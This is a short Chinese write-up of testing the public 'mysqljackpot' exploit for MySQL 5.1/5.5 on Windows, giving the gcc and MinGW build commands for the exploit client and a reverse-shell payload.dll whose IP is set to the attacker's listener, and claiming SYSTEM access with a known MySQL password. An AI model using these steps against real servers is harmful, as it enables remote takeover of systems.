MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot) 验证--windows下mysql提权
12月2日mysql爆出windows下5.1/5.5mysql账号可以提权至系统权限
见http://www.exploit-db.com/exploits/23073/
下面将我的测试步骤记录下来:
1、首先找到一台linux机器,我在上面已经安装了mysql,安装目录在/usr/local/mysql
2、下载poc程序,解压缩,然后编译mysqljackpot.c
gcc -o mysqljackpot mysqljackpot.c -I /usr/local/mysql/include -L /usr/local/mysql/lib/mysql/ -lmysqlclient
3、由于需要反向shell,需要借助payload.dll,这个文件需要在windows下编译,首先得安装MinGW,在MinGW下进行编译(需要修改payload.c中的ip为我们的反向shell所在的机器ip)
set PATH=%PATH%;c:\MinGW\bin\
gcc -c payload.c
gcc -shared -o payload.dll payload.o -lws2_32
4、在linux机器上执行程序,效果如下:
由上图可见,在已知mysql密码的情况下即可获取对方机器的系统权限!